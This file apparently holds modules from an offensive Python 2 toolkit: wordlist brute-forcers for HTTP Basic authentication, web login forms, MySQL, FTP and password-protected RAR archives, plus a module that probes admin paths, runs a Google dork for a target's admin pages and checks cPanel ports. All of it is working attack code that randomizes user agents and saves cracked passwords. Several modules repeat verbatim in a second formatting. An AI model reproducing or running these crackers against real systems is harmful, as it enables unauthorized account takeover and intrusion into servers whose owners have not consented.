def main(run):
isLive(init.var['target'], init.var['port'])
Loadingfile(init.var['dict'])
with open(init.var['dict'], 'r') as passwords:
for password in passwords:
password = password.replace("\n", "")
connection = httplib.HTTPConnection(init.var['target'],
init.var['port'])
header = {
"User-agent":
RamdonAgent(),
"Authorization":
"Basic " + base64.b64encode(init.var['user'] + ":" + password)
}
connection.request("GET", init.var['path'], "", header)
response = connection.getresponse()
if response.status == 200:
printAlert(
3, "Successfully with [" + init.var['user'] + "][" +
password + "]\n")
saveRegister(init, password)
return
else:
printAlert(0, " | Checking '" + password + "'")
printAlert(4, " No Result :c\n")
# END CODE MODULE ############################################################################################
def request_thread(password):
#@password : Password for Test in Service.
global STATE
params = urllib.urlencode({
init.var['data_a']: init.var['user'],
init.var['data_b']: password
})
header = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
"User-agent": RamdonAgent()
}
conn = httplib.HTTPConnection(init.var['target'], init.var['port'])
conn.request(init.var['method'], init.var['file'], params, header)
response = conn.getresponse()
ver_source = response.read()
if ver_source.find(init.var['alert']) != 0 and response.status == 200:
printAlert(
3, "Successfully with [" + init.var['data_a'] + "=" +
init.var['user'] + "][" + init.var['data_b'] + "=" + password +
"]\n")
saveRegister(init, password)
STATE = True
return True
else:
if STATE == False: printAlert(0, " | Checking '" + password + "'")
# END CODE MODULE ############################################################################################
def main(run):
isLive(init.var['target'], init.var['port'])
Loadingfile(init.var['file'])
Totalresults = ""
printAlert(5, "[1] Step : Starting Brute Force...")
with open(init.var['file'], 'r') as list_path:
for path in list_path:
path = "/" + path.replace("\n", "")
connection = httplib.HTTPConnection(init.var['target'],
init.var['port'])
connection.addheaders = [('User-agent', RamdonAgent())]
connection.request("GET", path)
response = connection.getresponse()
if response.status == 200 or response.status == 301:
printAlert(3, " | Response " + init.var['target'] + path)
Totalresults += "\t|" + init.var['target'] + path + "\n"
else:
printAlert(
0, " | Checking `" + colors[0] + path + "` Response:" +
str(response.status))
printAlert(5, "[2] Step : Starting Google Dorking...")
connection = httplib.HTTPConnection("www.google.com", 80)
connection.request("GET",
"/search?q=inurl:admin+site:" + str(init.var['target']))
connection.addheaders = [('User-agent', RamdonAgent())]
response = connection.getresponse()
soup = BeautifulSoup(response.read(), "lxml")
divList = soup.findAll('cite')
for ids in divList:
printAlert(3, "| Result " + ids.text)
Totalresults += "\t | " + ids.text + "\n"
printAlert(5, "[3] Step : Scanning Port commons...")
commonports = [2082, 2083, 2095, 2096]
for port in commonports:
printAlert(0, " | Testing Port " + str(port))
if isLive(init.var['target'], port):
printAlert(3, " | " + str(port) + " Port Open!")
Totalresults += "\t|" + str(port) + " Open! \n"
printAlert(0, "[*] Total Result")
print Totalresults
saveRegister(init, Totalresults)
# END CODE MODULE ############################################################################################
def main(run):
isLive(init.var['target'],init.var['port'])
Loadingfile(init.var['dict'])
with open(init.var['dict'],'r') as passwords:
for password in passwords:
password=password.replace("\n","")
try:
MySQLdb.connect(init.var['target'],init.var['user'],password,'',int(init.var['port']))
if True:
printAlert(3,"Successfully with ["+init.var['user']+"]["+password+"]\n")
saveRegister(init,password)
return
except:printAlert(0," | Checking '"+password+"'")
printAlert(4," No Result :c\n")
# END CODE MODULE ############################################################################################
def main(run):
Loadingfile(init.var['dict'])
Arch = open(init.var['dict'],"r")
leeArchivo = Arch.readlines()
RARarch = RarFile(init.var['file'])
for palabra in leeArchivo:
palabraLlegada = palabra.split("\n")
try:
RARarch.extractall(pwd=str(palabraLlegada[0]),path="/root/home/")
printAlert(3,"Successfully with ["+palabraLlegada[0]+"] -> /root/home/")
saveRegister(init,palabraLlegada[0])
Space()
return
except:printAlert(0," | Checking '"+palabraLlegada[0]+"'")
printAlert(4," No Result :c\n")
# END CODE MODULE ############################################################################################
def main(run):
isLive(init.var['target'],init.var['port'])
Loadingfile(init.var['file'])
Totalresults=""
printAlert(5,"[1] Step : Starting Brute Force...")
with open(init.var['file'],'r') as list_path:
for path in list_path:
path="/"+path.replace("\n","")
connection = httplib.HTTPConnection(init.var['target'],init.var['port'])
connection.addheaders=[('User-agent', RamdonAgent())]
connection.request("GET",path)
response = connection.getresponse()
if response.status == 200 or response.status == 301:
printAlert(3," | Response "+init.var['target']+path)
Totalresults+="\t|"+init.var['target']+path+"\n"
else:printAlert(0," | Checking `"+colors[0]+path+"` Response:"+str(response.status))
printAlert(5,"[2] Step : Starting Google Dorking...")
connection = httplib.HTTPConnection("www.google.com",80)
connection.request("GET", "/search?q=inurl:admin+site:"+str(init.var['target']))
connection.addheaders=[('User-agent', RamdonAgent())]
response = connection.getresponse()
soup = BeautifulSoup(response.read(), "lxml")
divList = soup.findAll('cite')
for ids in divList:
printAlert(3,"| Result "+ids.text)
Totalresults+="\t | "+ids.text+"\n"
printAlert(5,"[3] Step : Scanning Port commons...")
commonports = [2082,2083,2095,2096]
for port in commonports:
printAlert(0," | Testing Port "+str(port))
if isLive(init.var['target'],port):
printAlert(3," | "+str(port)+" Port Open!")
Totalresults+="\t|"+str(port)+" Open! \n"
printAlert(0,"[*] Total Result")
print Totalresults
saveRegister(init,Totalresults)
# END CODE MODULE ############################################################################################
def main(run):
isLive(init.var['target'],init.var['port'])
Loadingfile(init.var['dict'])
with open(init.var['dict'],'r') as passwords:
for password in passwords:
password=password.replace("\n","")
connection = httplib.HTTPConnection(init.var['target'],init.var['port'])
header={"User-agent" : RamdonAgent(),"Authorization":"Basic "+base64.b64encode(init.var['user']+":"+password)}
connection.request("GET",init.var['path'],"",header)
response = connection.getresponse()
if response.status == 200:
printAlert(3,"Successfully with ["+init.var['user']+"]["+password+"]\n")
saveRegister(init,password)
return
else:printAlert(0," | Checking '"+password+"'")
printAlert(4," No Result :c\n")
# END CODE MODULE ############################################################################################
def request_thread(password):
#@password : Password for Test in Service.
global STATE
params = urllib.urlencode({init.var['data_a']: init.var['user'], init.var['data_b']: password})
header={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain" , "User-agent" : RamdonAgent()}
conn = httplib.HTTPConnection(init.var['target'],init.var['port'])
conn.request(init.var['method'], init.var['file'], params, header)
response = conn.getresponse()
ver_source = response.read()
if ver_source.find(init.var['alert']) != 0 and response.status == 200:
printAlert(3,"Successfully with ["+init.var['data_a']+"="+init.var['user']+"]["+init.var['data_b']+"="+password+"]\n")
saveRegister(init,password)
STATE = True
return True
else:
if STATE==False:printAlert(0," | Checking '"+password+"'")
# END CODE MODULE ############################################################################################
def main(run):
isLive(init.var['target'],init.var['port'])
Loadingfile(init.var['dict'])
ftp = FTP()
ftp.connect(init.var['target'],int(init.var['port']))
with open(init.var['dict'],'r') as passwords:
for password in passwords:
password=password.replace("\n","")
try:
ftp.login(init.var['user'],password)
if True:
printAlert(3,"Successfully with ["+init.var['user']+"]["+password+"]\n")
Space()
saveRegister(init,password)
return
except:printAlert(0," | Checking '"+password+"'")
# END CODE MODULE ############################################################################################
def main(run):
Loadingfile(init.var['dict'])
Arch = open(init.var['dict'], "r")
leeArchivo = Arch.readlines()
RARarch = RarFile(init.var['file'])
for palabra in leeArchivo:
palabraLlegada = palabra.split("\n")
try:
RARarch.extractall(pwd=str(palabraLlegada[0]), path="/root/home/")
printAlert(
3,
"Successfully with [" + palabraLlegada[0] + "] -> /root/home/")
saveRegister(init, palabraLlegada[0])
Space()
return
except:
printAlert(0, " | Checking '" + palabraLlegada[0] + "'")
printAlert(4, " No Result :c\n")
# END CODE MODULE ############################################################################################
